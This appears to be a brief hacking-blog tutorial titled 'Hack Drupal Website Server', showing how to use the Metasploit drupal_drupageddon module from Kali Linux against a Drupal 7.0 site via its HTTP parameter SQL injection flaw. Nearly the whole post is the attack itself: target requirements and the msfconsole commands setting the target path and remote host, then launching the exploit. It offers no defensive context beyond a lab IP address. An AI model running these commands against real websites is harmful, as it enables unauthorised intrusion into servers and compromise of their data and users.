Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection


Exploit Targets
Drupal 7.0

Requirement
Attacker: kali Linux
Victim PC: Drupal 7.0


Open Kali terminal type msfconsole


msf exploit (drupal_drupageddon)>set targeturi /drupal/
msf exploit (drupal_drupageddon)>set rhost 192.168.0.109 (IP of Remote Host)
msf exploit (drupal_drupageddon)>exploit         
   

0 comments:

Post a Comment